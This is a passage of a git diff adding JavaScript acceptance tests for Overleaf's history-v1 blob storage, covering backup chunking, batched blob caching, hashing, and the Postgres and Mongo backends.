testFiles.GRAPH_PNG_BYTE_LENGTH, + stringLength: null, + }, + { + hash: File.EMPTY_FILE_HASH, + byteLength: 0, + stringLength: 0, + }, + ]) + + // Second chunk + expect(results[1].chunkRecord.startVersion).to.equal(10) + expect(results[1].chunkRecord.endVersion).to.equal(20) + expect(results[1].blobsToBackup).to.have.deep.members([ + { + hash: blobHash.fromString('a'.repeat(7)), + byteLength: 7, + stringLength: 7, + }, + { + hash: testFiles.NON_BMP_TXT_HASH, + byteLength: testFiles.NON_BMP_TXT_BYTE_LENGTH, + stringLength: null, + }, + ]) + + // Third chunk + expect(results[2].chunkRecord.startVersion).to.equal(20) + expect(results[2].chunkRecord.endVersion).to.equal(24) + expect(results[2].blobsToBackup).to.have.deep.members([ + { + hash: blobHash.fromString('a'.repeat(16)), + byteLength: 16, + stringLength: 16, + }, + ]) + }) + + for ( + let lastBackedUpVersion = 0; + lastBackedUpVersion <= FINAL_VERSION; + lastBackedUpVersion++ + ) { + it(`should yield the expected data when the last backed up version was ${lastBackedUpVersion}`, async function () { + const results = [] + for await (const result of backupGenerator( + projectId, + lastBackedUpVersion + )) { + results.push(result) + } + + const chunkDefinitions = [ + { + chunk: { startVersion: 0, endVersion: 10 }, + blobs: [ + { + version: 1, + blob: { + hash: testFiles.HELLO_TXT_HASH, + byteLength: testFiles.HELLO_TXT_BYTE_LENGTH, + stringLength: testFiles.HELLO_TXT_UTF8_LENGTH, + }, + }, + { + version: 2, + blob: { + hash: testFiles.GRAPH_PNG_HASH, + byteLength: testFiles.GRAPH_PNG_BYTE_LENGTH, + stringLength: null, + }, + }, + { + version: 3, + blob: { + hash: File.EMPTY_FILE_HASH, + byteLength: 0, + stringLength: 0, + }, + }, + ], + }, + { + chunk: { startVersion: 10, endVersion: 20 }, + blobs: [ + { + version: 11, + blob: { + hash: blobHash.fromString('a'.repeat(7)), + byteLength: 7, + stringLength: 7, + }, + }, + { + version: 14, + blob: { + hash: testFiles.NON_BMP_TXT_HASH, + byteLength: testFiles.NON_BMP_TXT_BYTE_LENGTH, + stringLength: null, + }, + }, + ], + }, + { + chunk: { startVersion: 20, endVersion: 24 }, + blobs: [ + { + version: 21, + blob: { + hash: blobHash.fromString('a'.repeat(16)), + byteLength: 16, + stringLength: 16, + }, + }, + ], + }, + ] + + const expectedChunks = 
chunkDefinitions + .filter(({ chunk }) => lastBackedUpVersion < chunk.endVersion) + .map(({ chunk }) => chunk) + const expectedBlobs = chunkDefinitions + .filter(({ chunk }) => lastBackedUpVersion < chunk.endVersion) + .map(({ blobs }) => + blobs + .filter(({ version }) => lastBackedUpVersion < version) + .map(({ blob }) => blob) + ) + + expect(results).to.have.length(expectedChunks.length) + expect(results).to.have.length(expectedBlobs.length) + + results.forEach((result, i) => { + expect(result.chunkRecord).to.deep.include(expectedChunks[i]) + expect(result.blobsToBackup).to.have.deep.members(expectedBlobs[i]) + }) + }) + } + + it(`should not back up blobs that have already been backed up in previous chunks`, async function () { + const results = [] + for await (const result of backupGenerator(projectId)) { + results.push(result) + } + const seenBlobs = new Set() + for (const result of results) { + for (const blob of result.blobsToBackup) { + expect(seenBlobs).to.not.include(blob.hash) + seenBlobs.add(blob.hash) + } + } + }) + }) +} diff --git a/services/history-v1/test/acceptance/js/storage/batch_blob_store.test.js b/services/history-v1/test/acceptance/js/storage/batch_blob_store.test.js new file mode 100644 index 0000000..645ea59 --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/batch_blob_store.test.js @@ -0,0 +1,52 @@ +'use strict' + +const { expect } = require('chai') + +const cleanup = require('./support/cleanup') +const testFiles = require('./support/test_files') + +const core = require('overleaf-editor-core') +const File = core.File + +const storage = require('../../../../storage') +const BatchBlobStore = storage.BatchBlobStore +const BlobStore = storage.BlobStore + +const projectId = '123' +const blobStore = new BlobStore(projectId) +const batchBlobStore = new BatchBlobStore(blobStore) + +describe('BatchBlobStore', function () { + beforeEach(cleanup.everything) + + it('can preload and batch getBlob calls', async function () { + // Add some test files + await Promise.all([ + blobStore.putFile(testFiles.path('graph.png')), + blobStore.putFile(testFiles.path('hello.txt')), + ]) + + // Cache some blobs (one that exists and another that doesn't) + await batchBlobStore.preload([ + testFiles.GRAPH_PNG_HASH, + File.EMPTY_FILE_HASH, // not found + ]) + expect(batchBlobStore.blobs.size).to.equal(1) + + const [cached, notCachedExists, notCachedNotExists, duplicate] = + await Promise.all([ + batchBlobStore.getBlob(testFiles.GRAPH_PNG_HASH), // cached + batchBlobStore.getBlob(testFiles.HELLO_TXT_HASH), // not cached; exists + batchBlobStore.getBlob(File.EMPTY_FILE_HASH), // not cached; not exists + batchBlobStore.getBlob(testFiles.GRAPH_PNG_HASH), // duplicate + ]) + + expect(cached.getHash()).to.equal(testFiles.GRAPH_PNG_HASH) + expect(notCachedExists.getHash()).to.equal(testFiles.HELLO_TXT_HASH) + expect(notCachedNotExists).to.be.undefined + expect(duplicate.getHash()).to.equal(testFiles.GRAPH_PNG_HASH) + + // We should get exactly the object from the cache. 
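+ // chai's .equal asserts strict (===) identity, unlike .deep.equal, so this
+ // confirms the very same Blob instance is returned from the cache.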
+ expect(cached).to.equal(batchBlobStore.blobs.get(testFiles.GRAPH_PNG_HASH)) + }) +}) diff --git a/services/history-v1/test/acceptance/js/storage/blob_hash.test.js b/services/history-v1/test/acceptance/js/storage/blob_hash.test.js new file mode 100644 index 0000000..77e4cc3 --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/blob_hash.test.js @@ -0,0 +1,15 @@ +'use strict' + +const { expect } = require('chai') +const storage = require('../../../../storage') +const blobHash = storage.blobHash + +describe('blobHash', function () { + it('can hash non-ASCII strings', function () { + // checked with git hash-object + const testString = 'å\n' + const testHash = 'aad321caf77ca6c5ab09e6c638c237705f93b001' + + expect(blobHash.fromString(testString)).to.equal(testHash) + }) +}) diff --git a/services/history-v1/test/acceptance/js/storage/blob_store.test.js b/services/history-v1/test/acceptance/js/storage/blob_store.test.js new file mode 100644 index 0000000..531b42e --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/blob_store.test.js @@ -0,0 +1,580 @@ +'use strict' + +const _ = require('lodash') +const { expect } = require('chai') +const config = require('config') +const fs = require('node:fs') +const path = require('node:path') +const { Readable } = require('node:stream') +const temp = require('temp').track() +const { promisify } = require('node:util') + +const cleanup = require('./support/cleanup') +const testFiles = require('./support/test_files') + +const { Blob, TextOperation } = require('overleaf-editor-core') +const { + BlobStore, + loadGlobalBlobs, + mongodb, + persistor, + streams, +} = require('../../../../storage') +const mongoBackend = require('../../../../storage/lib/blob_store/mongo') +const postgresBackend = require('../../../../storage/lib/blob_store/postgres') +const { getProjectBlobsBatch } = require('../../../../storage/lib/blob_store') + +const mkTmpDir = promisify(temp.mkdir) + +describe('BlobStore', function () { + const helloWorldString = 'Hello World' + const helloWorldHash = '5e1c309dae7f45e0f39b1bf3ac3cd9db12e7d689' + const globalBlobString = 'a' + const globalBlobHash = testFiles.STRING_A_HASH + const demotedBlobString = 'ab' + const demotedBlobHash = testFiles.STRING_AB_HASH + + beforeEach(cleanup.everything) + + beforeEach('install a global blob', async function () { + await mongodb.globalBlobs.insertOne({ + _id: globalBlobHash, + byteLength: globalBlobString.length, + stringLength: globalBlobString.length, + }) + await mongodb.globalBlobs.insertOne({ + _id: demotedBlobHash, + byteLength: demotedBlobString.length, + stringLength: demotedBlobString.length, + demoted: true, + }) + const bucket = config.get('blobStore.globalBucket') + for (const { key, content } of [ + { + key: '2e/65/efe2a145dda7ee51d1741299f848e5bf752e', + content: globalBlobString, + }, + { + key: '9a/e9/e86b7bd6cb1472d9373702d8249973da0832', + content: demotedBlobString, + }, + ]) { + const stream = Readable.from([content]) + await persistor.sendStream(bucket, key, stream) + } + await loadGlobalBlobs() + }) + + const scenarios = [ + { + description: 'Postgres backend', + projectId: '123', + projectId2: '456', + backend: postgresBackend, + }, + { + description: 'Mongo backend', + projectId: '63725f84b2bdd246ec8c0000', + projectId2: '63725f84b2bdd246ec8c1234', + backend: mongoBackend, + }, + ] + for (const scenario of scenarios) { + describe(scenario.description, function () { + const blobStore = new BlobStore(scenario.projectId) + const blobStore2 = new 
BlobStore(scenario.projectId2) + + beforeEach('initialize the blob stores', async function () { + await blobStore.initialize() + await blobStore2.initialize() + }) + + it('can initialize a project again without throwing an error', async function () { + await blobStore.initialize() + await blobStore2.initialize() + }) + + it('can store and fetch string content', async function () { + function checkBlob(blob) { + expect(blob.getHash()).to.equal(helloWorldHash) + expect(blob.getByteLength()).to.equal(helloWorldString.length) + expect(blob.getStringLength()).to.equal(helloWorldString.length) + } + + const insertedBlob = await blobStore.putString(helloWorldString) + checkBlob(insertedBlob) + const fetchedBlob = await blobStore.getBlob(helloWorldHash) + checkBlob(fetchedBlob) + const content = await blobStore.getString(helloWorldHash) + expect(content).to.equal(helloWorldString) + }) + + it('can store and fetch utf-8 files', async function () { + const testFile = 'hello.txt' + + function checkBlob(blob) { + expect(blob.getHash()).to.equal(testFiles.HELLO_TXT_HASH) + expect(blob.getByteLength()).to.equal(testFiles.HELLO_TXT_BYTE_LENGTH) + expect(blob.getStringLength()).to.equal( + testFiles.HELLO_TXT_UTF8_LENGTH + ) + } + + const insertedBlob = await blobStore.putFile(testFiles.path(testFile)) + checkBlob(insertedBlob) + const fetchedBlob = await blobStore.getBlob(testFiles.HELLO_TXT_HASH) + checkBlob(fetchedBlob) + const content = await blobStore.getString(testFiles.HELLO_TXT_HASH) + expect(content).to.equal('Olá mundo\n') + }) + + it('can store and fetch a large text file', async function () { + const testString = _.repeat('a', 1000000) + const testHash = 'de1fbf0c2f34f67f01f355f31ed0cf7319643c5e' + + function checkBlob(blob) { + expect(blob.getHash()).to.equal(testHash) + expect(blob.getByteLength()).to.equal(testString.length) + expect(blob.getStringLength()).to.equal(testString.length) + } + + const dir = await mkTmpDir('blobStore') + const pathname = path.join(dir, 'a.txt') + fs.writeFileSync(pathname, testString) + const insertedBlob = await blobStore.putFile(pathname) + checkBlob(insertedBlob) + const fetchedBlob = await blobStore.getBlob(testHash) + checkBlob(fetchedBlob) + const content = await blobStore.getString(testHash) + expect(content).to.equal(testString) + }) + + it('stores overlarge text files as binary', async function () { + const testString = _.repeat('a', TextOperation.MAX_STRING_LENGTH + 1) + const dir = await mkTmpDir('blobStore') + const pathname = path.join(dir, 'a.txt') + fs.writeFileSync(pathname, testString) + const blob = await blobStore.putFile(pathname) + expect(blob.getByteLength()).to.equal(testString.length) + expect(blob.getStringLength()).not.to.exist + }) + + it('can store and fetch binary files', async function () { + const testFile = 'graph.png' + + function checkBlob(blob) { + expect(blob.getHash()).to.equal(testFiles.GRAPH_PNG_HASH) + expect(blob.getByteLength()).to.equal(testFiles.GRAPH_PNG_BYTE_LENGTH) + expect(blob.getStringLength()).to.be.null + } + + const insertedBlob = await blobStore.putFile(testFiles.path(testFile)) + checkBlob(insertedBlob) + const fetchedBlob = await blobStore.getBlob(testFiles.GRAPH_PNG_HASH) + checkBlob(fetchedBlob) + const stream = await blobStore.getStream(testFiles.GRAPH_PNG_HASH) + const buffer = await streams.readStreamToBuffer(stream) + expect(buffer.length).to.equal(testFiles.GRAPH_PNG_BYTE_LENGTH) + expect(buffer.toString('hex', 0, 8)).to.equal( + testFiles.PNG_MAGIC_NUMBER + ) + }) + + const missingHash = 
'deadbeef00000000000000000000000000000000' + + it('fails to get a missing key as a string', async function () { + try { + await blobStore.getString(missingHash) + } catch (err) { + expect(err).to.be.an.instanceof(Blob.NotFoundError) + expect(err.hash).to.equal(missingHash) + return + } + expect.fail('expected NotFoundError') + }) + + it('fails to get a missing key as a stream', async function () { + try { + await blobStore.getStream(missingHash) + } catch (err) { + expect(err).to.be.an.instanceof(Blob.NotFoundError) + return + } + expect.fail('expected NotFoundError') + }) + + it('reads invalid utf-8 as utf-8', async function () { + // We shouldn't do this, but we need to know what happens if we do. + // TODO: We should throw an error instead, but this function doesn't have + // an easy way of checking the content type. + const testFile = 'graph.png' + await blobStore.putFile(testFiles.path(testFile)) + const content = await blobStore.getString(testFiles.GRAPH_PNG_HASH) + expect(content.length).to.equal(12902) + }) + + it('checks for non BMP characters', async function () { + const testFile = 'non_bmp.txt' + await blobStore.putFile(testFiles.path(testFile)) + const blob = await blobStore.getBlob(testFiles.NON_BMP_TXT_HASH) + expect(blob.getStringLength()).to.be.null + expect(blob.getByteLength()).to.equal(testFiles.NON_BMP_TXT_BYTE_LENGTH) + }) + + it('can fetch metadata for multiple blobs at once', async function () { + await blobStore.putFile(testFiles.path('graph.png')) + const blobs = await blobStore.getBlobs([ + testFiles.GRAPH_PNG_HASH, + testFiles.HELLO_TXT_HASH, // not found + testFiles.GRAPH_PNG_HASH, // requested twice + ]) + const hashes = blobs.map(blob => blob.getHash()) + expect(hashes).to.deep.equal([testFiles.GRAPH_PNG_HASH]) + }) + + describe('multiple blobs in the same project', async function () { + beforeEach(async function () { + await blobStore.putString(helloWorldString) + await blobStore.putFile(testFiles.path('graph.png')) + await blobStore.putFile(testFiles.path('hello.txt')) + }) + + it('getBlob() returns each blob', async function () { + const helloBlob = await blobStore.getBlob(testFiles.HELLO_TXT_HASH) + const graphBlob = await blobStore.getBlob(testFiles.GRAPH_PNG_HASH) + const helloWorldBlob = await blobStore.getBlob(helloWorldHash) + expect(helloBlob.hash).to.equal(testFiles.HELLO_TXT_HASH) + expect(graphBlob.hash).to.equal(testFiles.GRAPH_PNG_HASH) + expect(helloWorldBlob.hash).to.equal(helloWorldHash) + }) + + it('getBlobs() returns all blobs', async function () { + const blobs = await blobStore.getBlobs([ + testFiles.HELLO_TXT_HASH, + testFiles.GRAPH_PNG_HASH, + testFiles.NON_BMP_TXT_HASH, // not in blob store + ]) + const actualHashes = blobs.map(blob => blob.hash) + expect(actualHashes).to.have.members([ + testFiles.HELLO_TXT_HASH, + testFiles.GRAPH_PNG_HASH, + ]) + }) + + it('getProjectBlobs() returns all blobs in the project', async function () { + const blobs = await blobStore.getProjectBlobs() + const hashes = blobs.map(blob => blob.getHash()) + expect(hashes).to.have.members([ + testFiles.HELLO_TXT_HASH, + testFiles.GRAPH_PNG_HASH, + helloWorldHash, + ]) + }) + }) + + describe('two blob stores on different projects', function () { + beforeEach(async function () { + await blobStore.putString(helloWorldString) + await blobStore2.putFile(testFiles.path('graph.png')) + }) + + it('separates blobs when calling getBlob()', async function () { + const blobFromStore1 = await blobStore.getBlob(helloWorldHash) + const blobFromStore2 = await 
blobStore2.getBlob(helloWorldHash)
+ expect(blobFromStore1).to.exist
+ expect(blobFromStore2).not.to.exist
+ })
+
+ it('separates blobs when calling getBlobs()', async function () {
+ const blobsFromStore1 = await blobStore.getBlobs([
+ helloWorldHash,
+ testFiles.GRAPH_PNG_HASH,
+ ])
+ const blobsFromStore2 = await blobStore2.getBlobs([
+ helloWorldHash,
+ testFiles.GRAPH_PNG_HASH,
+ ])
+ expect(blobsFromStore1.map(blob => blob.getHash())).to.deep.equal([
+ helloWorldHash,
+ ])
+ expect(blobsFromStore2.map(blob => blob.getHash())).to.deep.equal([
+ testFiles.GRAPH_PNG_HASH,
+ ])
+ })
+
+ it('separates blobs when calling getStream()', async function () {
+ await blobStore2.getStream(testFiles.GRAPH_PNG_HASH)
+ try {
+ await blobStore.getStream(testFiles.GRAPH_PNG_HASH)
+ } catch (err) {
+ expect(err).to.be.an.instanceof(Blob.NotFoundError)
+ return
+ }
+ expect.fail(
+ 'expected Blob.NotFoundError when calling blobStore.getStream()'
+ )
+ })
+
+ it('separates blobs when calling getString()', async function () {
+ const content = await blobStore.getString(helloWorldHash)
+ expect(content).to.equal(helloWorldString)
+ try {
+ await blobStore2.getString(helloWorldHash)
+ } catch (err) {
+ expect(err).to.be.an.instanceof(Blob.NotFoundError)
+ return
+ }
+ expect.fail(
+ 'expected Blob.NotFoundError when calling blobStore2.getString()'
+ )
+ })
+
+ if (scenario.backend !== mongoBackend) {
+ // mongo backend has its own test for this, covering sharding
+ it('getProjectBlobsBatch() returns blobs per project', async function () {
+ const projects = [
+ parseInt(scenario.projectId, 10),
+ parseInt(scenario.projectId2, 10),
+ ]
+ const { nBlobs, blobs } =
+ await postgresBackend.getProjectBlobsBatch(projects)
+ expect(nBlobs).to.equal(2)
+ expect(Object.fromEntries(blobs.entries())).to.deep.equal({
+ [parseInt(scenario.projectId, 10)]: [
+ new Blob(helloWorldHash, 11, 11),
+ ],
+ [parseInt(scenario.projectId2, 10)]: [
+ new Blob(
+ testFiles.GRAPH_PNG_HASH,
+ testFiles.GRAPH_PNG_BYTE_LENGTH,
+ null
+ ),
+ ],
+ })
+ })
+ }
+ })
+
+ describe('a global blob', function () {
+ it('is available through getBlob()', async function () {
+ const blob = await blobStore.getBlob(globalBlobHash)
+ expect(blob.getHash()).to.equal(globalBlobHash)
+ })
+
+ it('is available through getBlobs()', async function () {
+ await blobStore.putString(helloWorldString)
+ const requestedHashes = [globalBlobHash, helloWorldHash]
+ const blobs = await blobStore.getBlobs(requestedHashes)
+ const hashes = blobs.map(blob => blob.getHash())
+ expect(hashes).to.have.members(requestedHashes)
+ })
+
+ it('is available through getString()', async function () {
+ const content = await blobStore.getString(globalBlobHash)
+ expect(content).to.equal('a')
+ })
+
+ it('is available through getStream()', async function () {
+ const stream = await blobStore.getStream(globalBlobHash)
+ const buffer = await streams.readStreamToBuffer(stream)
+ expect(buffer.toString()).to.equal(globalBlobString)
+ })
+
+ it("doesn't prevent putString() from adding the same blob", async function () {
+ const blob = await blobStore.putString(globalBlobString)
+ expect(blob.getHash()).to.equal(globalBlobHash)
+ const projectBlob = await scenario.backend.findBlob(
+ scenario.projectId,
+ globalBlobHash
+ )
+ expect(projectBlob).not.to.exist
+ })
+
+ it("doesn't prevent putFile() from adding the same blob", async function () {
+ const dir = await mkTmpDir('blobStore')
+ const pathname = path.join(dir, 'blob.txt')
+ fs.writeFileSync(pathname, globalBlobString)
+ const
blob = await blobStore.putFile(pathname) + expect(blob.getHash()).to.equal(globalBlobHash) + const projectBlob = await scenario.backend.findBlob( + scenario.projectId, + globalBlobHash + ) + expect(projectBlob).not.to.exist + }) + }) + + describe('a demoted global blob', function () { + it('is available through getBlob()', async function () { + const blob = await blobStore.getBlob(demotedBlobHash) + expect(blob.getHash()).to.equal(demotedBlobHash) + }) + + it('is available through getBlobs()', async function () { + await blobStore.putString(helloWorldString) + const requestedHashes = [demotedBlobHash, helloWorldHash] + const blobs = await blobStore.getBlobs(requestedHashes) + const hashes = blobs.map(blob => blob.getHash()) + expect(hashes).to.have.members(requestedHashes) + }) + + it('is available through getString()', async function () { + const content = await blobStore.getString(demotedBlobHash) + expect(content).to.equal(demotedBlobString) + }) + + it('is available through getStream()', async function () { + const stream = await blobStore.getStream(demotedBlobHash) + const buffer = await streams.readStreamToBuffer(stream) + expect(buffer.toString()).to.equal(demotedBlobString) + }) + + it("doesn't prevent putString() from creating a project blob", async function () { + const blob = await blobStore.putString(demotedBlobString) + expect(blob.getHash()).to.equal(demotedBlobHash) + const projectBlob = await scenario.backend.findBlob( + scenario.projectId, + demotedBlobHash + ) + expect(projectBlob).to.exist + }) + + it("doesn't prevent putFile() from creating a project blob", async function () { + const dir = await mkTmpDir('blobStore') + const pathname = path.join(dir, 'blob.txt') + fs.writeFileSync(pathname, demotedBlobString) + const blob = await blobStore.putFile(pathname) + expect(blob.getHash()).to.equal(demotedBlobHash) + const projectBlob = await scenario.backend.findBlob( + scenario.projectId, + demotedBlobHash + ) + expect(projectBlob).to.exist + }) + }) + + describe('deleting blobs', async function () { + beforeEach('install a project blob', async function () { + await blobStore.putString(helloWorldString) + const blob = await blobStore.getBlob(helloWorldHash) + expect(blob).to.exist + }) + + beforeEach('delete project blobs', async function () { + await blobStore.deleteBlobs() + }) + + it('deletes project blobs', async function () { + try { + await blobStore.getString(helloWorldHash) + expect.fail('expected NotFoundError') + } catch (err) { + expect(err).to.be.an.instanceof(Blob.NotFoundError) + } + }) + + it('retains global blobs', async function () { + const content = await blobStore.getString(globalBlobHash) + expect(content).to.equal(globalBlobString) + }) + }) + + describe('copyBlob method', function () { + it('copies a binary blob to another project in the same backend', async function () { + const testFile = 'graph.png' + const originalHash = testFiles.GRAPH_PNG_HASH + const insertedBlob = await blobStore.putFile(testFiles.path(testFile)) + await blobStore.copyBlob(insertedBlob, scenario.projectId2) + const copiedBlob = await blobStore2.getBlob(originalHash) + expect(copiedBlob.getHash()).to.equal(originalHash) + expect(copiedBlob.getByteLength()).to.equal( + insertedBlob.getByteLength() + ) + expect(copiedBlob.getStringLength()).to.be.null + }) + + it('copies a text blob to another project in the same backend', async function () { + const insertedBlob = await blobStore.putString(helloWorldString) + await blobStore.copyBlob(insertedBlob, scenario.projectId2) + const 
copiedBlob = await blobStore2.getBlob(helloWorldHash) + expect(copiedBlob.getHash()).to.equal(helloWorldHash) + const content = await blobStore2.getString(helloWorldHash) + expect(content).to.equal(helloWorldString) + }) + }) + + describe('copyBlob method with different backends', function () { + const otherScenario = scenarios.find( + s => s.backend !== scenario.backend + ) + const otherBlobStore = new BlobStore(otherScenario.projectId2) + + beforeEach(async function () { + await otherBlobStore.initialize() + }) + + it('copies a binary blob to another project in a different backend', async function () { + const testFile = 'graph.png' + const originalHash = testFiles.GRAPH_PNG_HASH + const insertedBlob = await blobStore.putFile(testFiles.path(testFile)) + await blobStore.copyBlob(insertedBlob, otherScenario.projectId2) + const copiedBlob = await otherBlobStore.getBlob(originalHash) + expect(copiedBlob).to.exist + expect(copiedBlob.getHash()).to.equal(originalHash) + expect(copiedBlob.getByteLength()).to.equal( + insertedBlob.getByteLength() + ) + expect(copiedBlob.getStringLength()).to.be.null + }) + + it('copies a text blob to another project in a different backend', async function () { + const insertedBlob = await blobStore.putString(helloWorldString) + await blobStore.copyBlob(insertedBlob, otherScenario.projectId2) + const copiedBlob = await otherBlobStore.getBlob(helloWorldHash) + expect(copiedBlob).to.exist + expect(copiedBlob.getHash()).to.equal(helloWorldHash) + const content = await otherBlobStore.getString(helloWorldHash) + expect(content).to.equal(helloWorldString) + }) + }) + }) + } + + it('getProjectBlobsBatch() with mixed projects', async function () { + for (const scenario of scenarios) { + const blobStore = new BlobStore(scenario.projectId) + const blobStore2 = new BlobStore(scenario.projectId2) + await blobStore.initialize() + await blobStore.putString(helloWorldString) + await blobStore2.initialize() + await blobStore2.putFile(testFiles.path('graph.png')) + } + + const projects = [ + parseInt(scenarios[0].projectId, 10), + scenarios[1].projectId, + parseInt(scenarios[0].projectId2, 10), + scenarios[1].projectId2, + ] + const { nBlobs, blobs } = await getProjectBlobsBatch(projects) + expect(nBlobs).to.equal(4) + expect(Object.fromEntries(blobs.entries())).to.deep.equal({ + [scenarios[0].projectId]: [new Blob(helloWorldHash, 11, 11)], + [scenarios[1].projectId]: [new Blob(helloWorldHash, 11, 11)], + [scenarios[0].projectId2]: [ + new Blob( + testFiles.GRAPH_PNG_HASH, + testFiles.GRAPH_PNG_BYTE_LENGTH, + null + ), + ], + [scenarios[1].projectId2]: [ + new Blob( + testFiles.GRAPH_PNG_HASH, + testFiles.GRAPH_PNG_BYTE_LENGTH, + null + ), + ], + }) + }) +}) diff --git a/services/history-v1/test/acceptance/js/storage/blob_store_mongo.test.js b/services/history-v1/test/acceptance/js/storage/blob_store_mongo.test.js new file mode 100644 index 0000000..3198278 --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/blob_store_mongo.test.js @@ -0,0 +1,172 @@ +const { expect } = require('chai') +const { ObjectId, Binary } = require('mongodb') +const { Blob } = require('overleaf-editor-core') +const cleanup = require('./support/cleanup') +const mongoBackend = require('../../../../storage/lib/blob_store/mongo') +const mongodb = require('../../../../storage/lib/mongodb') + +describe('BlobStore Mongo backend', function () { + const projectId = new ObjectId().toString() + const hashes = { + abcd: [ + 'abcd000000000000000000000000000000000000', + 
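+ // Ten more 'abcd'-prefixed hashes follow (eleven in total): the first eight fit in the projectHistoryBlobs record's bucket, and the rest spill into projectHistoryShardedBlobs, as the insertBlob tests below verify.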
'abcd111111111111111111111111111111111111', + 'abcd222222222222222222222222222222222222', + 'abcd333333333333333333333333333333333333', + 'abcd444444444444444444444444444444444444', + 'abcd555555555555555555555555555555555555', + 'abcd666666666666666666666666666666666666', + 'abcd777777777777777777777777777777777777', + 'abcd888888888888888888888888888888888888', + 'abcd999999999999999999999999999999999999', + 'abcdaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa', + ], + 1234: ['1234000000000000000000000000000000000000'], + 1337: ['1337000000000000000000000000000000000000'], + } + + beforeEach('clean up', cleanup.everything) + + beforeEach('initialize the project', async function () { + await mongoBackend.initialize(projectId) + }) + + describe('insertBlob', function () { + it('writes blobs to the projectHistoryBlobs collection', async function () { + for (const hash of hashes.abcd + .slice(0, 2) + .concat(hashes[1234].slice(0, 1))) { + const blob = new Blob(hash, 123, 99) + await mongoBackend.insertBlob(projectId, blob) + } + const record = await mongodb.blobs.findOne(new ObjectId(projectId), { + promoteBuffers: true, + }) + expect(record.blobs).to.deep.equal({ + abc: hashes.abcd.slice(0, 2).map(hash => ({ + h: Buffer.from(hash, 'hex'), + b: 123, + s: 99, + })), + 123: [{ h: Buffer.from(hashes[1234][0], 'hex'), b: 123, s: 99 }], + }) + }) + + it('writes excess blobs to the projectHistoryShardedBlobs collection', async function () { + for (const hash of hashes.abcd.concat(hashes[1234])) { + const blob = new Blob(hash, 123, 99) + await mongoBackend.insertBlob(projectId, blob) + } + const record = await mongodb.blobs.findOne(new ObjectId(projectId), { + promoteBuffers: true, + }) + expect(record.blobs).to.deep.equal({ + abc: hashes.abcd + .slice(0, 8) + .map(hash => ({ h: Buffer.from(hash, 'hex'), b: 123, s: 99 })), + 123: [{ h: Buffer.from(hashes[1234][0], 'hex'), b: 123, s: 99 }], + }) + const shardedRecord = await mongodb.shardedBlobs.findOne( + { _id: new Binary(Buffer.from(`${projectId}0a`, 'hex')) }, + { promoteBuffers: true } + ) + expect(shardedRecord.blobs).to.deep.equal({ + bcd: hashes.abcd + .slice(8) + .map(hash => ({ h: Buffer.from(hash, 'hex'), b: 123, s: 99 })), + }) + }) + }) + + describe('getProjectBlobsBatch', function () { + it('finds all the blobs', async function () { + const projectId0 = new ObjectId().toString() + const hashesProject0 = hashes[1234].concat(hashes.abcd) + const projectId1 = new ObjectId().toString() + const hashesProject1 = hashes[1337].concat(hashes.abcd) + const projectId2 = new ObjectId().toString() + const hashesProject2 = [] // no hashes + const projectId3 = new ObjectId().toString() + const hashesProject3 = hashes[1337] + const projectBlobs = { + [projectId0]: hashesProject0, + [projectId1]: hashesProject1, + [projectId2]: hashesProject2, + [projectId3]: hashesProject3, + } + for (const [projectId, hashes] of Object.entries(projectBlobs)) { + for (const hash of hashes) { + const blob = new Blob(hash, 123, 99) + await mongoBackend.insertBlob(projectId, blob) + } + } + const projects = [projectId0, projectId1, projectId2, projectId3] + const { nBlobs, blobs } = + await mongoBackend.getProjectBlobsBatch(projects) + expect(nBlobs).to.equal( + hashesProject0.length + hashesProject1.length + hashesProject3.length + ) + expect(Object.fromEntries(blobs.entries())).to.deep.equal({ + [projectId0]: hashesProject0.map(hash => new Blob(hash, 123, 99)), + [projectId1]: hashesProject1.map(hash => new Blob(hash, 123, 99)), + [projectId3]: hashesProject3.map(hash => new 
Blob(hash, 123, 99)), + }) + }) + }) + + describe('with existing blobs', function () { + beforeEach(async function () { + for (const hash of hashes.abcd.concat(hashes[1234])) { + const blob = new Blob(hash, 123, 99) + await mongoBackend.insertBlob(projectId, blob) + } + }) + + describe('findBlob', function () { + it('finds blobs in the projectHistoryBlobs collection', async function () { + const blob = await mongoBackend.findBlob(projectId, hashes.abcd[0]) + expect(blob.getHash()).to.equal(hashes.abcd[0]) + }) + + it('finds blobs in the projectHistoryShardedBlobs collection', async function () { + const blob = await mongoBackend.findBlob(projectId, hashes.abcd[9]) + expect(blob.getHash()).to.equal(hashes.abcd[9]) + }) + }) + + describe('findBlobs', function () { + it('finds blobs in the projectHistoryBlobs collection', async function () { + const requestedHashes = hashes.abcd.slice(0, 3).concat(hashes[1234]) + const blobs = await mongoBackend.findBlobs(projectId, requestedHashes) + const obtainedHashes = blobs.map(blob => blob.getHash()) + expect(obtainedHashes).to.have.members(requestedHashes) + }) + + it('finds blobs in the projectHistoryShardedBlobs collection', async function () { + const requestedHashes = [1, 3, 5, 8, 9].map(idx => hashes.abcd[idx]) + const blobs = await mongoBackend.findBlobs(projectId, requestedHashes) + const obtainedHashes = blobs.map(blob => blob.getHash()) + expect(obtainedHashes).to.have.members(requestedHashes) + }) + }) + + describe('getProjectBlobs', function () { + it('returns all blobs for a given project', async function () { + const blobs = await mongoBackend.getProjectBlobs(projectId) + const obtainedHashes = blobs.map(blob => blob.getHash()) + const expectedHashes = hashes.abcd.concat(hashes[1234]) + expect(obtainedHashes).to.have.members(expectedHashes) + }) + }) + + describe('deleteBlobs', function () { + it('deletes all blobs for a given project', async function () { + await mongoBackend.deleteBlobs(projectId) + const recordCount = await mongodb.blobs.count() + const shardedRecordCount = await mongodb.shardedBlobs.count() + expect(recordCount).to.equal(0) + expect(shardedRecordCount).to.equal(0) + }) + }) + }) +}) diff --git a/services/history-v1/test/acceptance/js/storage/blob_store_postgres.test.js b/services/history-v1/test/acceptance/js/storage/blob_store_postgres.test.js new file mode 100644 index 0000000..e762c33 --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/blob_store_postgres.test.js @@ -0,0 +1,42 @@ +const postgresBackend = require('../../../../storage/lib/blob_store/postgres') +const { ObjectId } = require('mongodb') +const { expect } = require('chai') + +describe('BlobStore postgres backend', function () { + describe('projectId validation', function () { + it('insertBlob rejects when called with bad projectId', async function () { + const projectId = new ObjectId().toString() + await expect( + postgresBackend.insertBlob(projectId, 'hash', 123, 